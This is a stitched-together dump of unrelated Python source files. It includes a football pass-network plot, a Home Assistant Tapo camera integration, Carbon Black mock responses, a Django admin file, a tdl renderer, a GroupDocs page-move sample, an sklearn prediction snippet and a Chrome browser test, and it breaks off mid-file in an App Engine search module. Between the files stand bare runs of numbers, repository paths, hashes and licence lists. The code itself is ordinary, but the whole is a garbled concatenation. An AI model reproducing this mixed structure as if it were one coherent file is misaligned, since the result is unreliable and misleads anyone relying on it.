players.rename({'id': 'tactics_id'}, axis='columns', inplace=True) players = players[['tactics_id', 'player_id', 'position_abbreviation']] ############################################################################## # Add player position information to the events dataframe # add on the position the player was playing in the formation to the events dataframe events = events.merge(players, on=['tactics_id', 'player_id'], how='left', validate='m:1') # add on the position the receipient was playing in the formation to the events dataframe events = events.merge(players.rename({'player_id': 'pass_recipient_id'}, axis='columns'), on=['tactics_id', 'pass_recipient_id'], how='left', validate='m:1', suffixes=['', '_receipt']) ############################################################################## # Create dataframes for passes and player locations # get a dataframe with all passes mask_pass = (events.team_name == team) & (events.type_name == 'Pass') to_keep = ['id', 'match_id', 'player_id', 'player_name', 'outcome_name', 'pass_recipient_id', 'pass_recipient_name', 'x', 'y', 'end_x', 'end_y', 'tactics_id', 'tactics_formation', 'position_abbreviation', 'position_abbreviation_receipt'] passes = events.loc[mask_pass, to_keep].copy() print('Formations used by {} in match: '.format(team), passes['tactics_formation'].unique()) ############################################################################## # Filter passes by chosen formation, then group all passes and receipts to # calculate avg x, avg y, count of events for each slot in the formation formation = 433 passes_formation = passes[(passes.tactics_formation == formation) & (passes.position_abbreviation_receipt.notnull())].copy() passer_passes = passes_formation[['position_abbreviation', 'x', 'y']].copy() recipient_passes = passes_formation[['position_abbreviation_receipt', 'end_x', 'end_y']].copy() # rename columns to match those in passer_passes recipient_passes.rename({'position_abbreviation_receipt': 'position_abbreviation', 'end_x': 'x', 'end_y': 'y'}, axis='columns', inplace=True) # create a new dataframe containing all individual passes and receipts from passes_formation appended_passes = pd.concat(objs=[passer_passes, recipient_passes], ignore_index=True) average_locs_and_count = appended_passes.groupby('position_abbreviation').agg({ 'x': ['mean'], 'y': ['mean', 'count']}) average_locs_and_count.columns = ['x', 'y', 'count'] ############################################################################## # Group the passes by unique pairings of players and add the avg player positions to this dataframe # calculate the number of passes between each position (using min/ max so we get passes both ways) passes_formation['pos_max'] = passes_formation[['position_abbreviation', 'position_abbreviation_receipt']].max(axis='columns') passes_formation['pos_min'] = passes_formation[['position_abbreviation', 'position_abbreviation_receipt']].min(axis='columns') passes_between = passes_formation.groupby(['pos_min', 'pos_max']).id.count().reset_index() passes_between.rename({'id': 'pass_count'}, axis='columns', inplace=True) # add on the location of each player so we have the start and end positions of the lines passes_between = passes_between.merge(average_locs_and_count, left_on='pos_min', right_index=True) passes_between = passes_between.merge(average_locs_and_count, left_on='pos_max', right_index=True, suffixes=['', '_end']) ############################################################################## # Calculate the line width and marker sizes relative to the largest counts max_line_width = 18 max_marker_size = 3000 passes_between['width'] = passes_between.pass_count / passes_between.pass_count.max() * max_line_width average_locs_and_count['marker_size'] = (average_locs_and_count['count'] / average_locs_and_count['count'].max() * max_marker_size) ############################################################################## # Set color to make the lines more transparent when fewer passes are made min_transparency = 0.3 color = np.array(to_rgba('white')) color = np.tile(color, (len(passes_between), 1)) c_transparency = passes_between.pass_count / passes_between.pass_count.max() c_transparency = (c_transparency * (1 - min_transparency)) + min_transparency color[:, 3] = c_transparency ############################################################################## # Plotting pitch = Pitch(pitch_type='statsbomb', orientation='horizontal', pitch_color='#22312b', line_color='#c7d5cc', figsize=(16, 11), constrained_layout=True, tight_layout=False) fig, ax = pitch.draw() pass_lines = pitch.lines(passes_between.x, passes_between.y, passes_between.x_end, passes_between.y_end, lw=passes_between.width, color=color, zorder=1, ax=ax) pass_nodes = pitch.scatter(average_locs_and_count.x, average_locs_and_count.y, s=average_locs_and_count.marker_size, color='red', edgecolors='black', linewidth=1, alpha=1, ax=ax) for index, row in average_locs_and_count.iterrows(): pitch.annotate(row.name, xy=(row.x, row.y), c='white', va='center', ha='center', size=16, weight='bold', ax=ax) title = ax.set_title("{} {} Formation vs {}".format(team, formation, opponent), size=28, y=0.97, color='#c7d5cc') fig.set_facecolor("#22312b")
55.226027
116
0.615032
976
8,063
4.862705
0.276639
0.052044
0.032448
0.044037
0.187948
0.147493
0.099452
0.073325
0.073325
0.053519
0
0.014395
0.155649
8,063
145
117
55.606897
0.682726
0.183306
0
0
0
0
0.23193
0.082807
0
0
0
0
0
1
0
false
0.309524
0.059524
0
0.059524
0.011905
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
4c79ab828e049f734329ac9fd7817c526a06676d
6,777
py
Python
custom_components/tapo_control/utils.py
david-kalbermatten/HomeAssistant-Tapo-Control
3f9f8316cf7e176bb6f8d798d709f3c6d346a527
[ "Apache-2.0" ]
null
null
null
custom_components/tapo_control/utils.py
david-kalbermatten/HomeAssistant-Tapo-Control
3f9f8316cf7e176bb6f8d798d709f3c6d346a527
[ "Apache-2.0" ]
null
null
null
custom_components/tapo_control/utils.py
david-kalbermatten/HomeAssistant-Tapo-Control
3f9f8316cf7e176bb6f8d798d709f3c6d346a527
[ "Apache-2.0" ]
null
null
null
import onvif import os import asyncio import urllib.parse from onvif import ONVIFCamera from pytapo import Tapo from .const import ENABLE_MOTION_SENSOR, DOMAIN, LOGGER, CLOUD_PASSWORD from homeassistant.const import CONF_IP_ADDRESS, CONF_USERNAME, CONF_PASSWORD from homeassistant.components.onvif.event import EventManager from homeassistant.components.ffmpeg import DATA_FFMPEG from haffmpeg.tools import IMAGE_JPEG, ImageFrame def registerController(host, username, password): return Tapo(host, username, password) async def isRtspStreamWorking(hass, host, username, password): _ffmpeg = hass.data[DATA_FFMPEG] ffmpeg = ImageFrame(_ffmpeg.binary, loop=hass.loop) username = urllib.parse.quote_plus(username) password = urllib.parse.quote_plus(password) streaming_url = f"rtsp://{username}:{password}@{host}:554/stream1" image = await asyncio.shield( ffmpeg.get_image( streaming_url, output_format=IMAGE_JPEG, ) ) return not image == b"" async def initOnvifEvents(hass, host, username, password): device = ONVIFCamera( host, 2020, username, password, f"{os.path.dirname(onvif.__file__)}/wsdl/", no_cache=True, ) try: await device.update_xaddrs() device_mgmt = device.create_devicemgmt_service() device_info = await device_mgmt.GetDeviceInformation() if "Manufacturer" not in device_info: raise Exception("Onvif connection has failed.") return device except Exception: pass return False async def getCamData(hass, controller): camData = {} presets = await hass.async_add_executor_job(controller.isSupportingPresets) camData["user"] = controller.user camData["basic_info"] = await hass.async_add_executor_job(controller.getBasicInfo) camData["basic_info"] = camData["basic_info"]["device_info"]["basic_info"] try: motionDetectionData = await hass.async_add_executor_job( controller.getMotionDetection ) motion_detection_enabled = motionDetectionData["enabled"] if motionDetectionData["digital_sensitivity"] == "20": motion_detection_sensitivity = "low" elif motionDetectionData["digital_sensitivity"] == "50": motion_detection_sensitivity = "normal" elif motionDetectionData["digital_sensitivity"] == "80": motion_detection_sensitivity = "high" else: motion_detection_sensitivity = None except Exception: motion_detection_enabled = None motion_detection_sensitivity = None camData["motion_detection_enabled"] = motion_detection_enabled camData["motion_detection_sensitivity"] = motion_detection_sensitivity try: privacy_mode = await hass.async_add_executor_job(controller.getPrivacyMode) privacy_mode = privacy_mode["enabled"] except Exception: privacy_mode = None camData["privacy_mode"] = privacy_mode try: alarmData = await hass.async_add_executor_job(controller.getAlarm) alarm = alarmData["enabled"] alarm_mode = alarmData["alarm_mode"] except Exception: alarm = None alarm_mode = None camData["alarm"] = alarm camData["alarm_mode"] = alarm_mode try: commonImageData = await hass.async_add_executor_job(controller.getCommonImage) day_night_mode = commonImageData["image"]["common"]["inf_type"] except Exception: day_night_mode = None camData["day_night_mode"] = day_night_mode try: led = await hass.async_add_executor_job(controller.getLED) led = led["enabled"] except Exception: led = None camData["led"] = led try: auto_track = await hass.async_add_executor_job(controller.getAutoTrackTarget) auto_track = auto_track["enabled"] except Exception: auto_track = None camData["auto_track"] = auto_track if presets: camData["presets"] = presets else: camData["presets"] = {} return camData async def update_listener(hass, entry): """Handle options update.""" host = entry.data.get(CONF_IP_ADDRESS) username = entry.data.get(CONF_USERNAME) password = entry.data.get(CONF_PASSWORD) motionSensor = entry.data.get(ENABLE_MOTION_SENSOR) cloud_password = entry.data.get(CLOUD_PASSWORD) try: if cloud_password != "": tapoController = await hass.async_add_executor_job( registerController, host, "admin", cloud_password ) else: tapoController = await hass.async_add_executor_job( registerController, host, username, password ) hass.data[DOMAIN][entry.entry_id]["controller"] = tapoController except Exception: LOGGER.error( "Authentication to Tapo camera failed." + " Please restart the camera and try again." ) for entity in hass.data[DOMAIN][entry.entry_id]["entities"]: entity._host = host entity._username = username entity._password = password if hass.data[DOMAIN][entry.entry_id]["events"]: await hass.data[DOMAIN][entry.entry_id]["events"].async_stop() if hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]: await hass.config_entries.async_forward_entry_unload(entry, "binary_sensor") hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = False if motionSensor: await setupOnvif(hass, entry, host, username, password) async def setupOnvif(hass, entry, host, username, password): hass.data[DOMAIN][entry.entry_id]["eventsDevice"] = await initOnvifEvents( hass, host, username, password ) if hass.data[DOMAIN][entry.entry_id]["eventsDevice"]: hass.data[DOMAIN][entry.entry_id]["events"] = EventManager( hass, hass.data[DOMAIN][entry.entry_id]["eventsDevice"], f"{entry.entry_id}_tapo_events", ) hass.data[DOMAIN][entry.entry_id]["eventsSetup"] = await setupEvents( hass, entry ) async def setupEvents(hass, entry): if not hass.data[DOMAIN][entry.entry_id]["events"].started: events = hass.data[DOMAIN][entry.entry_id]["events"] if await events.async_start(): if not hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]: hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = True hass.async_create_task( hass.config_entries.async_forward_entry_setup( entry, "binary_sensor" ) ) return True else: return False
34.93299
86
0.665044
735
6,777
5.910204
0.22585
0.029466
0.044199
0.065608
0.293738
0.269337
0.234346
0.080571
0.049724
0
0
0.00271
0.237716
6,777
193
87
35.11399
0.838173
0
0
0.156627
0
0
0.110979
0.024596
0
0
0
0
0
1
0.006024
false
0.114458
0.066265
0.006024
0.114458
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
d5b2ddd3598b303bcb8230980f8ef5b2b4388ef0
5,712
py
Python
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py
fslds/carbon-black-cloud-sdk-python
248a3c63d6b36d6fcdbcb3f51fb7751f062ed372
[ "MIT" ]
24
2020-10-16T22:07:38.000Z
2022-03-24T14:58:03.000Z
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py
fslds/carbon-black-cloud-sdk-python
248a3c63d6b36d6fcdbcb3f51fb7751f062ed372
[ "MIT" ]
63
2020-10-26T18:26:15.000Z
2022-03-31T17:31:02.000Z
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py
fslds/carbon-black-cloud-sdk-python
248a3c63d6b36d6fcdbcb3f51fb7751f062ed372
[ "MIT" ]
10
2020-11-09T11:54:23.000Z
2022-03-24T20:44:00.000Z
"""Mock responses for recommendations.""" SEARCH_REQ = { "criteria": { "policy_type": ['reputation_override'], "status": ['NEW', 'REJECTED', 'ACCEPTED'], "hashes": ['111', '222'] }, "rows": 50, "sort": [ { "field": "impact_score", "order": "DESC" } ] } SEARCH_RESP = { "results": [ { "recommendation_id": "91e9158f-23cc-47fd-af7f-8f56e2206523", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "32d2be78c00056b577295aa0943d97a5c5a0be357183fcd714c7f5036e4bdede", "filename": "XprotectService", "application": { "type": "EXE", "value": "FOO" } }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T20:53:39.000Z", "comment": "Ours is the fury" }, "impact": { "org_adoption": "LOW", "impacted_devices": 45, "event_count": 76, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } }, { "recommendation_id": "bd50c2b2-5403-4e9e-8863-9991f70df026", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "0bbc082cd8b3ff62898ad80a57cb5e1f379e3fcfa48fa2f9858901eb0c220dc0", "filename": "sophos ui.msi" }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T20:53:09.000Z", "comment": "Always pay your debts" }, "impact": { "org_adoption": "HIGH", "impacted_devices": 8, "event_count": 25, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } }, { "recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124", "filename": "mimecast for outlook 7.8.0.125 (x86).msi" }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T15:13:40.000Z", "comment": "Winter is coming" }, "impact": { "org_adoption": "MEDIUM", "impacted_devices": 45, "event_count": 79, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } } ], "num_found": 3 } ACTION_INIT = { "recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124", "filename": "mimecast for outlook 7.8.0.125 (x86).msi" }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T15:13:40.000Z", "comment": "Winter is coming" }, "impact": { "org_adoption": "MEDIUM", "impacted_devices": 45, "event_count": 79, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } } ACTION_REQS = [ { "action": "ACCEPT", "comment": "Alpha" }, { "action": "RESET" }, { "action": "REJECT", "comment": "Charlie" }, ] ACTION_REFRESH_SEARCH = { "criteria": { "status": ['NEW', 'REJECTED', 'ACCEPTED'], "policy_type": ['reputation_override'] }, "rows": 50 } ACTION_SEARCH_RESP = { "results": [ACTION_INIT], "num_found": 1 } ACTION_REFRESH_STATUS = ['ACCEPTED', 'NEW', 'REJECTED'] ACTION_INIT_ACCEPTED = { "recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124", "filename": "mimecast for outlook 7.8.0.125 (x86).msi" }, "workflow": { "status": "ACCEPTED", "ref_id": "e9410b754ea011ebbfd0db2585a41b07", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T15:13:40.000Z", "comment": "Winter is coming" }, "impact": { "org_adoption": "MEDIUM", "impacted_devices": 45, "event_count": 79, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } }
31.043478
98
0.500525
499
5,712
5.517034
0.266533
0.043589
0.036324
0.054486
0.671268
0.652016
0.641482
0.641482
0.641482
0.641482
0
0.179021
0.345763
5,712
183
99
31.213115
0.557667
0.006127
0
0.494253
0
0
0.495151
0.16505
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
d5b96915a161658ab58f977d3518461eda8624b2
1,407
py
Python
main/admin.py
sinahmr/childf
4e01f46867425b36b6431713b79debf585d69d37
[ "MIT" ]
null
null
null
main/admin.py
sinahmr/childf
4e01f46867425b36b6431713b79debf585d69d37
[ "MIT" ]
null
null
null
main/admin.py
sinahmr/childf
4e01f46867425b36b6431713b79debf585d69d37
[ "MIT" ]
null
null
null
from django.contrib import admin from django.contrib.auth.admin import UserAdmin as DjangoUserAdmin from django.contrib.auth.models import Group from django.utils.translation import ugettext_lazy as _ from main.models import UserInfo, User, Child, Volunteer, Donor, Letter, Need, PurchaseForInstitute, PurchaseForNeed, \ Activity, OngoingUserInfo @admin.register(User) class UserAdmin(DjangoUserAdmin): class UserInfoInline(admin.TabularInline): model = UserInfo extra = 1 max_num = 1 fieldsets = ( (None, {'fields': ('email', 'password')}), (_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}), (_('Important dates'), {'fields': ('last_login', 'date_joined')}), ) add_fieldsets = ( (None, { 'classes': ('wide',), 'fields': ('email', 'password1', 'password2'), }), ) list_display = ('email', 'userinfo', 'is_staff') search_fields = ('email', 'userinfo__first_name', 'userinfo__last_name') ordering = ('email',) inlines = [UserInfoInline] admin.site.unregister(Group) admin.site.register(Child) admin.site.register(Volunteer) admin.site.register(Donor) admin.site.register(Letter) admin.site.register(Need) admin.site.register(PurchaseForInstitute) admin.site.register(PurchaseForNeed) admin.site.register(Activity) admin.site.register(OngoingUserInfo)
31.977273
119
0.687278
149
1,407
6.355705
0.442953
0.095037
0.161563
0.044351
0
0
0
0
0
0
0
0.003428
0.170576
1,407
43
120
32.72093
0.808055
0
0
0
0
0
0.154229
0
0
0
0
0
0
1
0
false
0.054054
0.162162
0
0.378378
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
d5b9d02c239d39cdf1dcff5670b5cc5e359e73a5
2,515
py
Python
hunting/display/render.py
MoyTW/RL_Arena_Experiment
fb79c67576cd4de3e4a58278b4515098f38fb584
[ "MIT" ]
null
null
null
hunting/display/render.py
MoyTW/RL_Arena_Experiment
fb79c67576cd4de3e4a58278b4515098f38fb584
[ "MIT" ]
null
null
null
hunting/display/render.py
MoyTW/RL_Arena_Experiment
fb79c67576cd4de3e4a58278b4515098f38fb584
[ "MIT" ]
null
null
null
import tdl import time import hunting.constants as c class Renderer: def __init__(self, main_console=None, level_display_width=c.SCREEN_WIDTH, level_display_height=c.SCREEN_HEIGHT): if main_console is None: self.main_console = tdl.init(level_display_width, level_display_height, 'From Renderer Default Constructor') else: self.main_console = main_console self.level_display_width = level_display_width self.level_display_height = level_display_height self._level_console = tdl.Console(level_display_width, level_display_height) def _render_level(self, con, level): for x in range(level.width): for y in range(level.height): if level[x][y].blocks is not False: self._level_console.draw_rect(x, y, 1, 1, None, bg=[120, 0, 50]) else: self._level_console.draw_rect(x, y, 1, 1, None, bg=[30, 255, 30]) # TODO: This is pretty hacky! i = 1 for o in level._all_objects: if o.faction == '1': # TODO: Better faction implementation! color = [255, 0, 0] else: color = [0, 0, 255] self._level_console.draw_char(o.x, o.y, i, color) i += 1 con.blit(self._level_console) def render_all(self, level): self._render_level(self.main_console, level) tdl.flush() def clear(self, level): for o in level._all_objects: self._level_console.draw_char(o.x, o.y, ' ') def render_event(self, level, event): if event[c.EVENT_TYPE] == c.MOVEMENT_EVENT: # Clear previous location self._level_console.draw_char(event[c.MOVEMENT_PREV_X], event[c.MOVEMENT_PREV_Y], ' ', bg=[0, 15, 7]) # Retrieve faction and color o = level.get_object_by_id(event[c.OBJ_ID]) if o.faction == '1': # TODO: Better faction implementation! color = [255, 0, 0] else: color = [0, 0, 255] self._level_console.draw_char(event[c.OBJ_X], event[c.OBJ_Y], o.faction, fg=color) elif event[c.EVENT_TYPE] == c.OBJECT_DESTRUCTION_EVENT: self._level_console.draw_char(event[c.OBJ_X], event[c.OBJ_Y], ' ', bg=[0, 15, 7]) # Render self.main_console.blit(self._level_console) tdl.flush() def visualize(level, show_time=1): Renderer().render_all(level) time.sleep(show_time)
36.985294
120
0.603579
350
2,515
4.08
0.234286
0.094538
0.112045
0.098039
0.392157
0.340336
0.261905
0.240896
0.240896
0.218487
0
0.02784
0.285885
2,515
68
121
36.985294
0.767261
0.063221
0
0.28
0
0
0.01617
0
0
0
0
0.014706
0
1
0.12
false
0
0.06
0
0.2
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
d5bbaeac59cde7e794de669fe4ec0942d528fc8d
699
py
Python
Examples/PagesOperations/MovePage.py
groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples
af736c94240eeefef28bd81012c96ab2ea779088
[ "MIT" ]
null
null
null
Examples/PagesOperations/MovePage.py
groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples
af736c94240eeefef28bd81012c96ab2ea779088
[ "MIT" ]
null
null
null
Examples/PagesOperations/MovePage.py
groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples
af736c94240eeefef28bd81012c96ab2ea779088
[ "MIT" ]
null
null
null
# Import modules import groupdocs_merger_cloud from Common import Common # This example demonstrates how to move document page to a new position class MovePage: @classmethod def Run(cls): pagesApi = groupdocs_merger_cloud.PagesApi.from_config(Common.GetConfig()) options = groupdocs_merger_cloud.MoveOptions() options.file_info = groupdocs_merger_cloud.FileInfo("WordProcessing/four-pages.docx") options.output_path = "Output/move-pages.docx" options.page_number = 1 options.new_page_number = 2 result = pagesApi.move(groupdocs_merger_cloud.MoveRequest(options)) print("Output file path = " + result.path)
36.789474
93
0.711016
83
699
5.795181
0.53012
0.155925
0.2079
0
0
0
0
0
0
0
0
0.00363
0.211731
699
19
94
36.789474
0.869328
0.120172
0
0
0
0
0.115824
0.084829
0
0
0
0
0
1
0.076923
false
0
0.153846
0
0.307692
0.076923
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
d5bbb325b8069e32756e2756a7150bcc81d9e24f
221
py
Python
src/models/predict_model.py
joseluistello/Regression-Analysis-Apple-Data
85952edd22ba8c382f43357efc510763185fd6d1
[ "MIT" ]
null
null
null
src/models/predict_model.py
joseluistello/Regression-Analysis-Apple-Data
85952edd22ba8c382f43357efc510763185fd6d1
[ "MIT" ]
null
null
null
src/models/predict_model.py
joseluistello/Regression-Analysis-Apple-Data
85952edd22ba8c382f43357efc510763185fd6d1
[ "MIT" ]
null
null
null
y_pred=ml.predict(x_test) print(y_pred) from sklearn.metrics import r2_score r2_score(y_test,y_pred) pred_y_df=pd.DataFrame({'Actual Value':y_test,'Predicted Value':y_pred, 'Difference': y_test-y_pred}) pred_y_df[0:20]
24.555556
101
0.791855
44
221
3.636364
0.5
0.15625
0.075
0.125
0.2125
0.2125
0.2125
0
0
0
0
0.024272
0.067873
221
9
102
24.555556
0.752427
0
0
0
0
0
0.166667
0
0
0
0
0
0
1
0
false
0
0.166667
0
0.166667
0.166667
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
d5c40e739be914cd8694a4a6735e497e975d7778
1,791
py
Python
tests/test_webdriver_chrome.py
kidosoft/splinter
6d5052fd73c0a626299574cea76924e367c67faa
[ "BSD-3-Clause" ]
1
2016-09-21T19:32:47.000Z
2016-09-21T19:32:47.000Z
tests/test_webdriver_chrome.py
kidosoft/splinter
6d5052fd73c0a626299574cea76924e367c67faa
[ "BSD-3-Clause" ]
null
null
null
tests/test_webdriver_chrome.py
kidosoft/splinter
6d5052fd73c0a626299574cea76924e367c67faa
[ "BSD-3-Clause" ]
1
2019-12-02T15:19:07.000Z
2019-12-02T15:19:07.000Z
# -*- coding: utf-8 -*- # Copyright 2013 splinter authors. All rights reserved. # Use of this source code is governed by a BSD-style # license that can be found in the LICENSE file. import os import unittest from splinter import Browser from .fake_webapp import EXAMPLE_APP from .base import WebDriverTests from selenium.common.exceptions import WebDriverException def chrome_installed(): try: Browser("chrome") except WebDriverException: return False return True class ChromeBrowserTest(WebDriverTests, unittest.TestCase): @classmethod def setUpClass(cls): cls.browser = Browser("chrome") @classmethod def tearDownClass(cls): cls.browser.quit() def setUp(self): self.browser.visit(EXAMPLE_APP) def test_attach_file(self): "should provide a way to change file field value" file_path = os.path.join( os.path.abspath(os.path.dirname(__file__)), 'mockfile.txt' ) self.browser.attach_file('file', file_path) self.browser.find_by_name('upload').click() html = self.browser.html self.assertIn('text/plain', html) self.assertIn(open(file_path).read().encode('utf-8'), html) def test_should_support_with_statement(self): with Browser('chrome') as internet: pass class ChromeBrowserFullscreenTest(WebDriverTests, unittest.TestCase): @classmethod def setUpClass(cls): cls.browser = Browser("chrome", fullscreen=True) @classmethod def tearDownClass(cls): cls.browser.quit() def setUp(self): self.browser.visit(EXAMPLE_APP) def test_should_support_with_statement(self): with Browser('chrome', fullscreen=True) as internet: pass
25.225352
69
0.672808
213
1,791
5.539906
0.455399
0.055085
0.044068
0.069492
0.372034
0.372034
0.372034
0.372034
0.372034
0.372034
0
0.004357
0.231156
1,791
70
70
25.585714
0.852578
0.123953
0
0.382979
0
0
0.070676
0
0
0
0
0
0.042553
1
0.212766
false
0.042553
0.12766
0
0.425532
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
d5e19c75c00ba0d6d2f1c4a0eb15f229a98c4904
7,259
py
Python
webapp/search.py
henchan/memfinity
3860985e29b203f0569f60eea68ffb22aaf34b1f
[ "MIT" ]
null
null
null
webapp/search.py
henchan/memfinity
3860985e29b203f0569f60eea68ffb22aaf34b1f
[ "MIT" ]
null
null
null
webapp/search.py
henchan/memfinity
3860985e29b203f0569f60eea68ffb22aaf34b1f
[ "MIT" ]
null
null
null
"""High-level search API. This module implements application-specific search semantics on top of App Engine's search API. There are two chief operations: querying for entities, and managing entities in the search facility. Add and remove Card entities in the search facility: insert_cards([models.Card]) delete_cards([models.Card]) Query for Card entities: query_cards(query_string, limit=20) -> search.SearchResults The results items will have the following fields: user_key, user_nickname, front, back, info, tag (repeated), added, modified, source_url The query_string is free-form, as a user would enter it, and passes through a custom query processor before the query is submitted to App Engine. Notably, pass @username to restrict the query to entities authored by username, and #tag to restrict the query to only documents matching the given tag. Multiple @usernames or #tags result in an OR query. """ import re from google.appengine.api import search from google.appengine.ext import ndb QUERY_LIMIT = 20 CARD_INDEX_NAME = 'cards' # Increase this value when _card2doc changes its format so that # queries can determine the data available on returned documents. CARD_DOCUMENT_VERSION = '1' # Ensure we're under the 2000 character limit from # https://developers.google.com/appengine/docs/python/search/query_strings MAX_QUERY_LEN = 200 # TODO(chris): it would be better if this module didn't know about # specific entity types, but instead defined a protocol to get # metadata from an entity and generate a document. def insert_cards(cards): """Insert or update models.Card entities in the search facility.""" # TODO(chris): should we allow more than 200 cards per call? assert len(cards) <= 200, len(cards) card_docs = map(_card2doc, cards) index = search.Index(name=CARD_INDEX_NAME) index.put(card_docs) def delete_cards(cards): """Delete models.Card entities from the search facility.""" index = search.Index(name=CARD_INDEX_NAME) card_doc_ids = map(_card2docid, cards) index.delete(card_doc_ids) def query_cards(query_str, limit=QUERY_LIMIT, web_safe_cursor=None, ids_only=False, user_key=None): """Return the search.SearchResults for a query. ids_only is useful because the returned document IDs are url-safe keys for models.Card entities. """ if web_safe_cursor: cursor = search.Cursor(web_safe_string=web_safe_cursor) else: cursor = None index = search.Index(name=CARD_INDEX_NAME) query_processor = _QueryProcessor( query_str, name_field='user_nickname', tag_field='tag', private_field='private', user_key_field='user_key', query_options=search.QueryOptions(limit=limit, cursor=cursor, ids_only=ids_only), user_key=user_key) search_results = index.search(query_processor.query()) # TODO(chris): should this return partially-instantiated # models.Card instances instead of leaking implementation details # like we do now? return search_results def _card2doc(card): # TODO(chris): should we include all fields that would be needed # for rendering a search results item to avoid entity lookup? tag_fields = [search.AtomField(name='tag', value=tag) for tag in card.tags] doc = search.Document( doc_id=_card2docid(card), fields=[ search.AtomField(name='doc_version', value=CARD_DOCUMENT_VERSION), search.AtomField(name='user_key', value=card.user_key.urlsafe()), # TODO(chris): is user_nickname always a direct-match # shortname, e.g., @chris? search.AtomField(name='user_nickname', value=card.user_nickname), # TODO(chris): support HtmlField for richer cards? search.TextField(name='front', value=card.front), search.TextField(name='back', value=card.back), search.TextField(name='info', value=card.info), search.DateField(name='added', value=card.added), search.DateField(name='modified', value=card.modified), search.AtomField(name='source_url', value=card.source_url), search.AtomField(name='private', value="1" if card.private else "0"), ] + tag_fields) return doc def _card2docid(card): # We set the search.Document's ID to the entity key it mirrors. return card.key.urlsafe() def _sanitize_user_input(query_str): # The search API puts special meaning on certain inputs and we # don't want to expose the internal query language to users so # we strictly restrict inputs. The rules are: # # Allowed characters for values are [a-zA-Z0-9._-]. # @name is removed and 'name' values returned as a list. # #tag is removed and 'tag' values returned as a list. terms, names, tags = [], [], [] for token in query_str.split(): # TODO(chris): allow international characters. sane_token = re.sub(r'[^a-zA-Z0-9._-]+', '', token) if sane_token: if sane_token in ('AND', 'OK'): continue # ignore special search keywords elif token.startswith('@'): names.append(sane_token) elif token.startswith('#'): tags.append(sane_token) else: terms.append(sane_token) return terms, names, tags class _QueryProcessor(object): """Simple queries, possibly with @name and #tag tokens. name_field is the field @name tokens should apply to. tag_field is the name of the field #tag tokens should apply to. """ def __init__(self, query_str, name_field, tag_field, private_field, user_key_field, query_options=None, user_key=None): self.query_str = query_str self.name_field = name_field self.tag_field = tag_field self.private_field = private_field self.user_key_field = user_key_field self.query_options = query_options self.user_key = user_key def _sanitize_user_input(self): query_str = self.query_str[:MAX_QUERY_LEN] return _sanitize_user_input(query_str) def _build_query_string(self): terms, names, tags = self._sanitize_user_input() # Our simply query logic is to OR together all terms from the # user, then AND in the name or tag filters (plus a privacy clause). parts = [] if terms: parts.append(' OR '.join(terms)) if 